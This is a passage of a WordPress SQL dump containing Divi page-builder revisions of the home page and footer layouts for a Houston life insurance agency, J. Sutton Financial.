Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-03-26 20:14:01','2023-03-26 20:14:01','',523,'http://cmdev-site1.com/?p=541',0,'revision','',0),(531,1,'2023-03-26 20:04:15','2023-03-26 20:04:15','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" background_color=\"#666666\" sticky_enabled=\"0\" custom_padding=\"61px||0px|||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" link_font=\"||||on||||dotted\" sticky_enabled=\"0\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"0px||0px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-03-26 20:04:15','2023-03-26 20:04:15','',523,'http://cmdev-site1.com/?p=531',0,'revision','',0),(532,1,'2023-03-26 20:06:06','2023-03-26 20:06:06','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||103px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 20:06:06','2023-03-26 20:06:06','',138,'http://cmdev-site1.com/?p=532',0,'revision','',0),(533,1,'2023-03-26 20:06:52','2023-03-26 20:06:52','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"61px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','J. Sutton - Footer Part 1','','publish','closed','closed','','j-sutton-footer-part-1','','','2023-03-26 20:06:52','2023-03-26 20:06:52','',0,'http://cmdev-site1.com/et_pb_layout/j-sutton-footer-part-1/',0,'et_pb_layout','',0),(534,1,'2023-03-26 20:07:12','2023-03-26 20:07:12','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','J. Sutton - Footer Part 2','','publish','closed','closed','','j-sutton-footer-part-2','','','2023-03-26 20:07:12','2023-03-26 20:07:12','',0,'http://cmdev-site1.com/et_pb_layout/j-sutton-footer-part-2/',0,'et_pb_layout','',0),(747,1,'2023-04-04 00:10:45','2023-04-04 00:10:45','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-04 00:10:45','2023-04-04 00:10:45','',138,'http://cmdev-site1.com/?p=747',0,'revision','',0),(536,1,'2023-03-26 20:08:01','2023-03-26 20:08:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||103px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"61px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p 